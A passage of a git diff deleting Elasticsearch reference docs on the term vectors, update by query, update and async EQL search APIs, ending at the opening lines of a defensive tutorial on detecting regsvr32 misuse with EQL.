(default), the document fields not in the original -mapping will be dynamically created.* - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors -{ - "doc" : { - "fullname" : "John Doe", - "text" : "test test test" - } -} --------------------------------------------------- -// TEST[continued] - -[[docs-termvectors-per-field-analyzer]] -====== Per-field analyzer - -Additionally, a different analyzer than the one at the field may be provided -by using the `per_field_analyzer` parameter. This is useful in order to -generate term vectors in any fashion, especially when using artificial -documents. When providing an analyzer for a field that already stores term -vectors, the term vectors will be re-generated. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors -{ - "doc" : { - "fullname" : "John Doe", - "text" : "test test test" - }, - "fields": ["fullname"], - "per_field_analyzer" : { - "fullname": "keyword" - } -} --------------------------------------------------- -// TEST[continued] - -Response: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_type": "_doc", - "_version": 0, - "found": true, - "took": 6, - "term_vectors": { - "fullname": { - "field_statistics": { - "sum_doc_freq": 2, - "doc_count": 4, - "sum_ttf": 4 - }, - "terms": { - "John Doe": { - "term_freq": 1, - "tokens": [ - { - "position": 0, - "start_offset": 0, - "end_offset": 8 - } - ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TESTRESPONSE[s/"took": 6/"took": "$body.took"/] -// TESTRESPONSE[s/"sum_doc_freq": 2/"sum_doc_freq": "$body.term_vectors.fullname.field_statistics.sum_doc_freq"/] -// TESTRESPONSE[s/"doc_count": 4/"doc_count": "$body.term_vectors.fullname.field_statistics.doc_count"/] -// TESTRESPONSE[s/"sum_ttf": 4/"sum_ttf": "$body.term_vectors.fullname.field_statistics.sum_ttf"/] - - -[[docs-termvectors-terms-filtering]] -===== Terms filtering - -Finally, the terms returned could be filtered based on their tf-idf scores. In -the example below we obtain the three most "interesting" keywords from the -artificial document having the given "plot" field value. Notice -that the keyword "Tony" or any stop words are not part of the response, as -their tf-idf must be too low. - -[source,console] --------------------------------------------------- -GET /imdb/_termvectors -{ - "doc": { - "plot": "When wealthy industrialist Tony Stark is forced to build an armored suit after a life-threatening incident, he ultimately decides to use its technology to fight against evil." - }, - "term_statistics": true, - "field_statistics": true, - "positions": false, - "offsets": false, - "filter": { - "max_num_terms": 3, - "min_term_freq": 1, - "min_doc_freq": 1 - } -} --------------------------------------------------- -// TEST[skip:no imdb test index] - -Response: - -[source,console-result] --------------------------------------------------- -{ - "_index": "imdb", - "_type": "_doc", - "_version": 0, - "found": true, - "term_vectors": { - "plot": { - "field_statistics": { - "sum_doc_freq": 3384269, - "doc_count": 176214, - "sum_ttf": 3753460 - }, - "terms": { - "armored": { - "doc_freq": 27, - "ttf": 27, - "term_freq": 1, - "score": 9.74725 - }, - "industrialist": { - "doc_freq": 88, - "ttf": 88, - "term_freq": 1, - "score": 8.590818 - }, - "stark": { - "doc_freq": 44, - "ttf": 47, - "term_freq": 1, - "score": 9.272792 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/docs/update-by-query.asciidoc b/docs/reference/docs/update-by-query.asciidoc deleted file mode 100644 index 72e52071b9a..00000000000 --- a/docs/reference/docs/update-by-query.asciidoc +++ /dev/null @@ -1,794 +0,0 @@ -[[docs-update-by-query]] -=== Update By Query API -++++ -Update by query -++++ - -Updates documents that match the specified query. -If no query is specified, performs an update on every document in the data stream or index without -modifying the source, which is useful for picking up mapping changes. - -[source,console] --------------------------------------------------- -POST my-index-000001/_update_by_query?conflicts=proceed --------------------------------------------------- -// TEST[setup:my_index_big] - -//// - -[source,console-result] --------------------------------------------------- -{ - "took" : 147, - "timed_out": false, - "updated": 120, - "deleted": 0, - "batches": 1, - "version_conflicts": 0, - "noops": 0, - "retries": { - "bulk": 0, - "search": 0 - }, - "throttled_millis": 0, - "requests_per_second": -1.0, - "throttled_until_millis": 0, - "total": 120, - "failures" : [ ] -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 147/"took" : "$body.took"/] - -//// - -[[docs-update-by-query-api-request]] -==== {api-request-title} - -`POST //_update_by_query` - -[[docs-update-by-query-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the following -<> for the target data stream, index, -or index alias: - -** `read` -** `index` or `write` - -[[docs-update-by-query-api-desc]] -==== {api-description-title} - -You can specify the query criteria in the request URI or the request body -using the same syntax as the <>. - -When you submit an update by query request, {es} gets a snapshot of the data stream or index -when it begins processing the request and updates matching documents using -`internal` versioning. -When the versions match, the document is updated and the version number is incremented. -If a document changes between the time that the snapshot is taken and -the update operation is processed, it results in a version conflict and the operation fails. -You can opt to count version conflicts instead of halting and returning by -setting `conflicts` to `proceed`. - -NOTE: Documents with a version equal to 0 cannot be updated using update by -query because `internal` versioning does not support 0 as a valid -version number. - -While processing an update by query request, {es} performs multiple search -requests sequentially to find all of the matching documents. -A bulk update request is performed for each batch of matching documents. -Any query or update failures cause the update by query request to fail and -the failures are shown in the response. -Any update requests that completed successfully still stick, they are not rolled back. - -===== Refreshing shards - -Specifying the `refresh` parameter refreshes all shards once the request completes. -This is different than the update API's `refresh` parameter, which causes just the shard -that received the request to be refreshed. Unlike the update API, it does not support -`wait_for`. - -[[docs-update-by-query-task-api]] -===== Running update by query asynchronously - -If the request contains `wait_for_completion=false`, {es} -performs some preflight checks, launches the request, and returns a -<> you can use to cancel or get the status of the task. -{es} creates a record of this task as a document at `.tasks/task/${taskId}`. -When you are done with a task, you should delete the task document so -{es} can reclaim the space. - -===== Waiting for active shards - -`wait_for_active_shards` controls how many copies of a shard must be active -before proceeding with the request. See <> -for details. `timeout` controls how long each write request waits for unavailable -shards to become available. Both work exactly the way they work in the -<>. Update by query uses scrolled searches, so you can also -specify the `scroll` parameter to control how long it keeps the search context -alive, for example `?scroll=10m`. The default is 5 minutes. - -===== Throttling update requests - -To control the rate at which update by query issues batches of update operations, -you can set `requests_per_second` to any positive decimal number. This pads each -batch with a wait time to throttle the rate. Set `requests_per_second` to `-1` -to disable throttling. - -Throttling uses a wait time between batches so that the internal scroll requests -can be given a timeout that takes the request padding into account. The padding -time is the difference between the batch size divided by the -`requests_per_second` and the time spent writing. By default the batch size is -`1000`, so if `requests_per_second` is set to `500`: - -[source,txt] --------------------------------------------------- -target_time = 1000 / 500 per second = 2 seconds -wait_time = target_time - write_time = 2 seconds - .5 seconds = 1.5 seconds --------------------------------------------------- - -Since the batch is issued as a single `_bulk` request, large batch sizes -cause {es} to create many requests and wait before starting the next set. -This is "bursty" instead of "smooth". - -[[docs-update-by-query-slice]] -===== Slicing - -Update by query supports <> to parallelize the -update process. This can improve efficiency and provide a -convenient way to break the request down into smaller parts. - -Setting `slices` to `auto` chooses a reasonable number for most data streams and indices. -If you're slicing manually or otherwise tuning automatic slicing, keep in mind -that: - -* Query performance is most efficient when the number of `slices` is equal to -the number of shards in the index or backing index. If that number is large (for example, -500), choose a lower number as too many `slices` hurts performance. Setting -`slices` higher than the number of shards generally does not improve efficiency -and adds overhead. - -* Update performance scales linearly across available resources with the -number of slices. - -Whether query or update performance dominates the runtime depends on the -documents being reindexed and cluster resources. - -[[docs-update-by-query-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -Wildcard (`*`) expressions are supported. -+ -To search all data streams or indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[docs-update-by-query-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyzer] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyze_wildcard] - -`conflicts`:: - (Optional, string) What to do if update by query hits version conflicts: - `abort` or `proceed`. Defaults to `abort`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=default_operator] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=df] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=from] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=lenient] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=max_docs] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=pipeline] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=request_cache] - -`refresh`:: -(Optional, Boolean) -If `true`, {es} refreshes affected shards to make the operation visible to -search. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=requests_per_second] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -`scroll`:: -(Optional, <>) -Period to retain the <> for scrolling. See -<>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=scroll_size] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search_type] - -`search_timeout`:: -(Optional, <>) -Explicit timeout for each search request. -Defaults to no timeout. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=slices] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=sort] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=stats] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=terminate_after] - -`timeout`:: -+ --- -(Optional, <>) -Period each update request waits for the following operations: - -* Dynamic mapping updates -* <> - -Defaults to `1m` (one minute). This guarantees {es} waits for at least the -timeout before failing. The actual wait time could be longer, particularly when -multiple waits occur. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -[[docs-update-by-query-api-request-body]] -==== {api-request-body-title} - -`query`:: - (Optional, <>) Specifies the documents to update - using the <>. - - -[[docs-update-by-query-api-response-body]] -==== Response body - -`took`:: -The number of milliseconds from start to end of the whole operation. - -`timed_out`:: -This flag is set to `true` if any of the requests executed during the -update by query execution has timed out. - -`total`:: -The number of documents that were successfully processed. - -`updated`:: -The number of documents that were successfully updated. - -`deleted`:: -The number of documents that were successfully deleted. - -`batches`:: -The number of scroll responses pulled back by the update by query. - -`version_conflicts`:: -The number of version conflicts that the update by query hit. - -`noops`:: -The number of documents that were ignored because the script used for -the update by query returned a `noop` value for `ctx.op`. - -`retries`:: -The number of retries attempted by update by query. `bulk` is the number of bulk -actions retried, and `search` is the number of search actions retried. - -`throttled_millis`:: -Number of milliseconds the request slept to conform to `requests_per_second`. - -`requests_per_second`:: -The number of requests per second effectively executed during the update by query. - -`throttled_until_millis`:: -This field should always be equal to zero in an `_update_by_query` response. It only -has meaning when using the <>, where it -indicates the next time (in milliseconds since epoch) a throttled request will be -executed again in order to conform to `requests_per_second`. - -`failures`:: -Array of failures if there were any unrecoverable errors during the process. If -this is non-empty then the request aborted because of those failures. -Update by query is implemented using batches. Any failure causes the entire -process to abort, but all failures in the current batch are collected into the -array. You can use the `conflicts` option to prevent reindex from aborting on -version conflicts. - -[[docs-update-by-query-api-example]] -==== {api-examples-title} - -The simplest usage of `_update_by_query` just performs an update on every -document in the data stream or index without changing the source. This is useful to -<> or some other online -mapping change. - -To update selected documents, specify a query in the request body: - -[source,console] --------------------------------------------------- -POST my-index-000001/_update_by_query?conflicts=proceed -{ - "query": { <1> - "term": { - "user.id": "kimchy" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> The query must be passed as a value to the `query` key, in the same -way as the <>. You can also use the `q` -parameter in the same way as the search API. - -Update documents in multiple data streams or indices: - -[source,console] --------------------------------------------------- -POST my-index-000001,my-index-000002/_update_by_query --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - -Limit the update by query operation to shards that a particular routing value: - -[source,console] --------------------------------------------------- -POST my-index-000001/_update_by_query?routing=1 --------------------------------------------------- -// TEST[setup:my_index] - -By default update by query uses scroll batches of 1000. -You can change the batch size with the `scroll_size` parameter: - -[source,console] --------------------------------------------------- -POST my-index-000001/_update_by_query?scroll_size=100 --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-update-by-query-api-source]] -===== Update the document source - -Update by query supports scripts to update the document source. -For example, the following request increments the `count` field for all -documents with a `user.id` of `kimchy` in `my-index-000001`: - -//// -[source,console] ----- -PUT my-index-000001/_create/1 -{ - "user": { - "id": "kimchy" - }, - "count": 1 -} ----- -//// - -[source,console] --------------------------------------------------- -POST my-index-000001/_update_by_query -{ - "script": { - "source": "ctx._source.count++", - "lang": "painless" - }, - "query": { - "term": { - "user.id": "kimchy" - } - } -} --------------------------------------------------- -// TEST[continued] - -Note that `conflicts=proceed` is not specified in this example. In this case, a -version conflict should halt the process so you can handle the failure. - -As with the <>, you can set `ctx.op` to change the -operation that is performed: - -[horizontal] -`noop`:: -Set `ctx.op = "noop"` if your script decides that it doesn't have to make any changes. -The update by query operation skips updating the document and increments the `noop` counter. - -`delete`:: -Set `ctx.op = "delete"` if your script decides that the document should be deleted. -The update by query operation deletes the document and increments the `deleted` counter. - -Update by query only supports `update`, `noop`, and `delete`. -Setting `ctx.op` to anything else is an error. Setting any other field in `ctx` is an error. -This API only enables you to modify the source of matching documents, you cannot move them. - -[[docs-update-by-query-api-ingest-pipeline]] -===== Update documents using an ingest pipeline - -Update by query can use the <> feature by specifying a `pipeline`: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/set-foo -{ - "description" : "sets foo", - "processors" : [ { - "set" : { - "field": "foo", - "value": "bar" - } - } ] -} -POST my-index-000001/_update_by_query?pipeline=set-foo --------------------------------------------------- -// TEST[setup:my_index] - - -[discrete] -[[docs-update-by-query-fetch-tasks]] -===== Get the status of update by query operations - -You can fetch the status of all running update by query requests with the -<>: - -[source,console] --------------------------------------------------- -GET _tasks?detailed=true&actions=*byquery --------------------------------------------------- -// TEST[skip:No tasks to retrieve] - -The responses looks like: - -[source,console-result] --------------------------------------------------- -{ - "nodes" : { - "r1A2WoRbTwKZ516z6NEs5A" : { - "name" : "r1A2WoR", - "transport_address" : "127.0.0.1:9300", - "host" : "127.0.0.1", - "ip" : "127.0.0.1:9300", - "attributes" : { - "testattr" : "test", - "portsfile" : "true" - }, - "tasks" : { - "r1A2WoRbTwKZ516z6NEs5A:36619" : { - "node" : "r1A2WoRbTwKZ516z6NEs5A", - "id" : 36619, - "type" : "transport", - "action" : "indices:data/write/update/byquery", - "status" : { <1> - "total" : 6154, - "updated" : 3500, - "created" : 0, - "deleted" : 0, - "batches" : 4, - "version_conflicts" : 0, - "noops" : 0, - "retries": { - "bulk": 0, - "search": 0 - }, - "throttled_millis": 0 - }, - "description" : "" - } - } - } - } -} --------------------------------------------------- - -<1> This object contains the actual status. It is just like the response JSON -with the important addition of the `total` field. `total` is the total number -of operations that the reindex expects to perform. You can estimate the -progress by adding the `updated`, `created`, and `deleted` fields. The request -will finish when their sum is equal to the `total` field. - -With the task id you can look up the task directly. The following example -retrieves information about task `r1A2WoRbTwKZ516z6NEs5A:36619`: - -[source,console] --------------------------------------------------- -GET /_tasks/r1A2WoRbTwKZ516z6NEs5A:36619 --------------------------------------------------- -// TEST[catch:missing] - -The advantage of this API is that it integrates with `wait_for_completion=false` -to transparently return the status of completed tasks. If the task is completed -and `wait_for_completion=false` was set on it, then it'll come back with a -`results` or an `error` field. The cost of this feature is the document that -`wait_for_completion=false` creates at `.tasks/task/${taskId}`. It is up to -you to delete that document. - - -[discrete] -[[docs-update-by-query-cancel-task-api]] -===== Cancel an update by query operation - -Any update by query can be cancelled using the <>: - -[source,console] --------------------------------------------------- -POST _tasks/r1A2WoRbTwKZ516z6NEs5A:36619/_cancel --------------------------------------------------- - -The task ID can be found using the <>. - -Cancellation should happen quickly but might take a few seconds. The task status -API above will continue to list the update by query task until this task checks -that it has been cancelled and terminates itself. - - -[discrete] -[[docs-update-by-query-rethrottle]] -===== Change throttling for a request - -The value of `requests_per_second` can be changed on a running update by query -using the `_rethrottle` API: - -[source,console] --------------------------------------------------- -POST _update_by_query/r1A2WoRbTwKZ516z6NEs5A:36619/_rethrottle?requests_per_second=-1 --------------------------------------------------- - -The task ID can be found using the <>. - -Just like when setting it on the `_update_by_query` API, `requests_per_second` -can be either `-1` to disable throttling or any decimal number -like `1.7` or `12` to throttle to that level. Rethrottling that speeds up the -query takes effect immediately, but rethrotting that slows down the query will -take effect after completing the current batch. This prevents scroll -timeouts. - -[discrete] -[[docs-update-by-query-manual-slice]] -===== Slice manually -Slice an update by query manually by providing a slice id and total number of -slices to each request: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_update_by_query -{ - "slice": { - "id": 0, - "max": 2 - }, - "script": { - "source": "ctx._source['extra'] = 'test'" - } -} -POST my-index-000001/_update_by_query -{ - "slice": { - "id": 1, - "max": 2 - }, - "script": { - "source": "ctx._source['extra'] = 'test'" - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -Which you can verify works with: - -[source,console] ----------------------------------------------------------------- -GET _refresh -POST my-index-000001/_search?size=0&q=extra:test&filter_path=hits.total ----------------------------------------------------------------- -// TEST[continued] - -Which results in a sensible `total` like this one: - -[source,console-result] ----------------------------------------------------------------- -{ - "hits": { - "total": { - "value": 120, - "relation": "eq" - } - } -} ----------------------------------------------------------------- - -[discrete] -[[docs-update-by-query-automatic-slice]] -===== Use automatic slicing - -You can also let update by query automatically parallelize using -<> to slice on `_id`. Use `slices` to specify the number of -slices to use: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_update_by_query?refresh&slices=5 -{ - "script": { - "source": "ctx._source['extra'] = 'test'" - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -Which you also can verify works with: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_search?size=0&q=extra:test&filter_path=hits.total ----------------------------------------------------------------- -// TEST[continued] - -Which results in a sensible `total` like this one: - -[source,console-result] ----------------------------------------------------------------- -{ - "hits": { - "total": { - "value": 120, - "relation": "eq" - } - } -} ----------------------------------------------------------------- - -Setting `slices` to `auto` will let Elasticsearch choose the number of slices -to use. This setting will use one slice per shard, up to a certain limit. If -there are multiple source data streams or indices, it will choose the number of slices based -on the index or backing index with the smallest number of shards. - -Adding `slices` to `_update_by_query` just automates the manual process used in -the section above, creating sub-requests which means it has some quirks: - -* You can see these requests in the -<>. These sub-requests are "child" -tasks of the task for the request with `slices`. -* Fetching the status of the task for the request with `slices` only contains -the status of completed slices. -* These sub-requests are individually addressable for things like cancellation -and rethrottling. -* Rethrottling the request with `slices` will rethrottle the unfinished -sub-request proportionally. -* Canceling the request with `slices` will cancel each sub-request. -* Due to the nature of `slices` each sub-request won't get a perfectly even -portion of the documents. All documents will be addressed, but some slices may -be larger than others. Expect larger slices to have a more even distribution. -* Parameters like `requests_per_second` and `max_docs` on a request with -`slices` are distributed proportionally to each sub-request. Combine that with -the point above about distribution being uneven and you should conclude that -using `max_docs` with `slices` might not result in exactly `max_docs` documents -being updated. -* Each sub-request gets a slightly different snapshot of the source data stream or index -though these are all taken at approximately the same time. - -[discrete] -[[picking-up-a-new-property]] -===== Pick up a new property - -Say you created an index without dynamic mapping, filled it with data, and then -added a mapping value to pick up more fields from the data: - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "dynamic": false, <1> - "properties": { - "text": {"type": "text"} - } - } -} - -POST test/_doc?refresh -{ - "text": "words words", - "flag": "bar" -} -POST test/_doc?refresh -{ - "text": "words words", - "flag": "foo" -} -PUT test/_mapping <2> -{ - "properties": { - "text": {"type": "text"}, - "flag": {"type": "text", "analyzer": "keyword"} - } -} --------------------------------------------------- - -<1> This means that new fields won't be indexed, just stored in `_source`. - -<2> This updates the mapping to add the new `flag` field. To pick up the new -field you have to reindex all documents with it. - -Searching for the data won't find anything: - -[source,console] --------------------------------------------------- -POST test/_search?filter_path=hits.total -{ - "query": { - "match": { - "flag": "foo" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "hits" : { - "total": { - "value": 0, - "relation": "eq" - } - } -} --------------------------------------------------- - -But you can issue an `_update_by_query` request to pick up the new mapping: - -[source,console] --------------------------------------------------- -POST test/_update_by_query?refresh&conflicts=proceed -POST test/_search?filter_path=hits.total -{ - "query": { - "match": { - "flag": "foo" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "hits" : { - "total": { - "value": 1, - "relation": "eq" - } - } -} --------------------------------------------------- - -You can do the exact same thing when adding a field to a multifield. diff --git a/docs/reference/docs/update.asciidoc b/docs/reference/docs/update.asciidoc deleted file mode 100644 index a4998eab61d..00000000000 --- a/docs/reference/docs/update.asciidoc +++ /dev/null @@ -1,360 +0,0 @@ -[[docs-update]] -=== Update API -++++ -Update -++++ - -Updates a document using the specified script. - -[[docs-update-api-request]] -==== {api-request-title} - -`POST //_update/<_id>` - -[[docs-update-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `index` or -`write` <> for the target index or -index alias. - -[[update-api-desc]] -==== {api-description-title} - -Enables you to script document updates. The script can update, delete, or skip -modifying the document. The update API also supports passing a partial document, -which is merged into the existing document. To fully replace an existing -document, use the <>. - -This operation: - -. Gets the document (collocated with the shard) from the index. -. Runs the specified script. -. Indexes the result. - -The document must still be reindexed, but using `update` removes some network -roundtrips and reduces chances of version conflicts between the GET and the -index operation. - -The `_source` field must be enabled to use `update`. In addition to `_source`, -you can access the following variables through the `ctx` map: `_index`, -`_type`, `_id`, `_version`, `_routing`, and `_now` (the current timestamp). - -[[docs-update-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Name of the target index. By default, the index is created -automatically if it doesn't exist. For more information, see <>. - -`<_id>`:: -(Required, string) Unique identifier for the document to be updated. - -[[docs-update-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_seq_no] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_primary_term] - -`lang`:: -(Optional, string) The script language. Default: `painless`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=require-alias] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -`retry_on_conflict`:: -(Optional, integer) Specify how many times should the operation be retried when - a conflict occurs. Default: 0. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -`_source`:: -(Optional, list) Set to `false` to disable source retrieval (default: `true`). -You can also specify a comma-separated list of the fields you want to retrieve. - -`_source_excludes`:: -(Optional, list) Specify the source fields you want to exclude. - -`_source_includes`:: -(Optional, list) Specify the source fields you want to retrieve. - -`timeout`:: -+ --- -(Optional, <>) -Period to wait for the following operations: - -* <> updates -* <> - -Defaults to `1m` (one minute). This guarantees {es} waits for at least the -timeout before failing. The actual wait time could be longer, particularly when -multiple waits occur. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -[[update-api-example]] -==== {api-examples-title} - -First, let's index a simple doc: - -[source,console] --------------------------------------------------- -PUT test/_doc/1 -{ - "counter" : 1, - "tags" : ["red"] -} --------------------------------------------------- - -To increment the counter, you can submit an update request with the -following script: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script" : { - "source": "ctx._source.counter += params.count", - "lang": "painless", - "params" : { - "count" : 4 - } - } -} --------------------------------------------------- -// TEST[continued] - -Similarly, you could use and update script to add a tag to the list of tags -(this is just a list, so the tag is added even it exists): - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script": { - "source": "ctx._source.tags.add(params.tag)", - "lang": "painless", - "params": { - "tag": "blue" - } - } -} --------------------------------------------------- -// TEST[continued] - -You could also remove a tag from the list of tags. The Painless -function to `remove` a tag takes the array index of the element -you want to remove. To avoid a possible runtime error, you first need to -make sure the tag exists. If the list contains duplicates of the tag, this -script just removes one occurrence. - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script": { - "source": "if (ctx._source.tags.contains(params.tag)) { ctx._source.tags.remove(ctx._source.tags.indexOf(params.tag)) }", - "lang": "painless", - "params": { - "tag": "blue" - } - } -} --------------------------------------------------- -// TEST[continued] - -You can also add and remove fields from a document. For example, this script -adds the field `new_field`: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script" : "ctx._source.new_field = 'value_of_new_field'" -} --------------------------------------------------- -// TEST[continued] - -Conversely, this script removes the field `new_field`: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script" : "ctx._source.remove('new_field')" -} --------------------------------------------------- -// TEST[continued] - -Instead of updating the document, you can also change the operation that is -executed from within the script. For example, this request deletes the doc if -the `tags` field contains `green`, otherwise it does nothing (`noop`): - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script": { - "source": "if (ctx._source.tags.contains(params.tag)) { ctx.op = 'delete' } else { ctx.op = 'none' }", - "lang": "painless", - "params": { - "tag": "green" - } - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -===== Update part of a document - -The following partial update adds a new field to the -existing document: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "doc": { - "name": "new_name" - } -} --------------------------------------------------- -// TEST[continued] - -If both `doc` and `script` are specified, then `doc` is ignored. If you -specify a scripted update, include the fields you want to update in the script. - -[discrete] -===== Detect noop updates - -By default updates that don't change anything detect that they don't change -anything and return `"result": "noop"`: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "doc": { - "name": "new_name" - } -} --------------------------------------------------- -// TEST[continued] - -If the value of `name` is already `new_name`, the update -request is ignored and the `result` element in the response returns `noop`: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 0, - "successful": 0, - "failed": 0 - }, - "_index": "test", - "_type": "_doc", - "_id": "1", - "_version": 7, - "_primary_term": 1, - "_seq_no": 6, - "result": "noop" -} --------------------------------------------------- - -You can disable this behavior by setting `"detect_noop": false`: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "doc": { - "name": "new_name" - }, - "detect_noop": false -} --------------------------------------------------- -// TEST[continued] - -[[upserts]] -[discrete] -===== Upsert - -If the document does not already exist, the contents of the `upsert` element -are inserted as a new document. If the document exists, the -`script` is executed: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "script": { - "source": "ctx._source.counter += params.count", - "lang": "painless", - "params": { - "count": 4 - } - }, - "upsert": { - "counter": 1 - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -[[scripted_upsert]] -===== Scripted upsert - -To run the script whether or not the document exists, set `scripted_upsert` to -`true`: - -[source,console] --------------------------------------------------- -POST sessions/_update/dh3sgudg8gsrgl -{ - "scripted_upsert": true, - "script": { - "id": "my_web_session_summariser", - "params": { - "pageViewEvent": { - "url": "foo.com/bar", - "response": 404, - "time": "2014-01-01 12:32" - } - } - }, - "upsert": {} -} --------------------------------------------------- -// TEST[s/"id": "my_web_session_summariser"/"source": "ctx._source.page_view_event = params.pageViewEvent"/] -// TEST[continued] - -[discrete] -[[doc_as_upsert]] -===== Doc as upsert - -Instead of sending a partial `doc` plus an `upsert` doc, you can set -`doc_as_upsert` to `true` to use the contents of `doc` as the `upsert` -value: - -[source,console] --------------------------------------------------- -POST test/_update/1 -{ - "doc": { - "name": "new_name" - }, - "doc_as_upsert": true -} --------------------------------------------------- -// TEST[continued] -[NOTE] -==== -Using <> with `doc_as_upsert` is not supported. -==== diff --git a/docs/reference/eql/delete-async-eql-search-api.asciidoc b/docs/reference/eql/delete-async-eql-search-api.asciidoc deleted file mode 100644 index 107b3609d55..00000000000 --- a/docs/reference/eql/delete-async-eql-search-api.asciidoc +++ /dev/null @@ -1,47 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[[delete-async-eql-search-api]] -=== Delete async EQL search API -++++ -Delete async EQL search -++++ - -beta::[] - -Deletes an <> or a -<>. The API also -deletes results for the search. - -[source,console] ----- -DELETE /_eql/search/FkpMRkJGS1gzVDRlM3g4ZzMyRGlLbkEaTXlJZHdNT09TU2VTZVBoNDM3cFZMUToxMDM= ----- -// TEST[skip: no access to search ID] - -[[delete-async-eql-search-api-request]] -==== {api-request-title} - -`DELETE /_eql/search/` - -[[delete-async-eql-search-api-prereqs]] -==== {api-prereq-title} - -See <>. - -[[delete-async-eql-search-api-limitations]] -===== Limitations - -See <>. - -[[delete-async-eql-search-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Identifier for the search to delete. -+ -A search ID is provided in the <>'s response for -an <>. A search ID is also provided if the -request's <> parameter -is `true`. diff --git a/docs/reference/eql/detect-threats-with-eql.asciidoc b/docs/reference/eql/detect-threats-with-eql.asciidoc deleted file mode 100644 index ccf8d92658d..00000000000 --- a/docs/reference/eql/detect-threats-with-eql.asciidoc +++ /dev/null @@ -1,387 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[eql-ex-threat-detection]] -== Example: Detect threats with EQL - -beta::[] - -This example tutorial shows how you can use EQL to detect security threats and -other suspicious behavior. In the scenario, you're tasked with detecting -https://attack.mitre.org/techniques/T1218/010/[regsvr32 misuse] in Windows event -logs. - -`regsvr32.exe` is a built-in command-line utility used to register `.dll` -libraries in Windows. As a native tool, `regsvr32.exe` has a trusted status, -letting it bypass most allowlist software and script blockers. -Attackers with access to a user's command line can use `regsvr32.exe` to run -malicious scripts via `.dll` libraries, even on machines that otherwise -disallow such scripts. - -One common variant of regsvr32 misuse is a -https://attack.mitre.org/techniques/T1218/010/[Squiblydoo 